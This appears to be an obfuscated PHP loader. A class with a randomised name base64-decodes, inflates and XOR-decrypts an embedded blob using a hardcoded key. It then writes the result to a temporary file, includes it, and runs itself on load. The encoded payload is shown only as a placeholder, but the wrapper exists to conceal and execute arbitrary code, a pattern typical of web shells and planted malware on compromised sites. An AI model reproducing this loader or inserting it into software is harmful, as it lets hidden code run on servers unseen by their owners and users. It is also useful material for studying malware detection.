<?php
class EncryptedExecutorc8dfb {
    private function retrieveKey3() {
        return '820r4mMNy8yyulFA';
    }

    private function uncoverValue3() {
        $data = '[encoded data, 34456 characters]';
        $decoded = base64_decode($data);
        $inflated = @gzinflate($decoded);
        if ($inflated === false) {
            $inflated = $decoded;
        }
        $b64_decoded = base64_decode($inflated);
        if ($b64_decoded === false) {
            return '';
        }
        $key = $this->retrieveKey3();
        $plain_code = '';
        if (strlen($key) > 0) {
            for ($i = 0, $len = strlen($b64_decoded); $i < $len; $i++) {
                $plain_code .= chr(ord($b64_decoded[$i]) ^ ord($key[$i % strlen($key)]));
            }
        } else {
            $plain_code = $b64_decoded;
        }
        return $plain_code;
    }

    private function executeCode($code) {
        $tmp_file = tmpfile();
        $tmp_file_path = stream_get_meta_data($tmp_file)['uri'];
        fwrite($tmp_file,  $code);
        fseek($tmp_file, 0);
        include $tmp_file_path;
        fclose($tmp_file);
    }

    public static function runApproveToken3() {
        $obj = new self();
        $decrypted = $obj->uncoverValue3();
        $obj->executeCode($decrypted);
    }
}

EncryptedExecutorc8dfb::runApproveToken3();
?>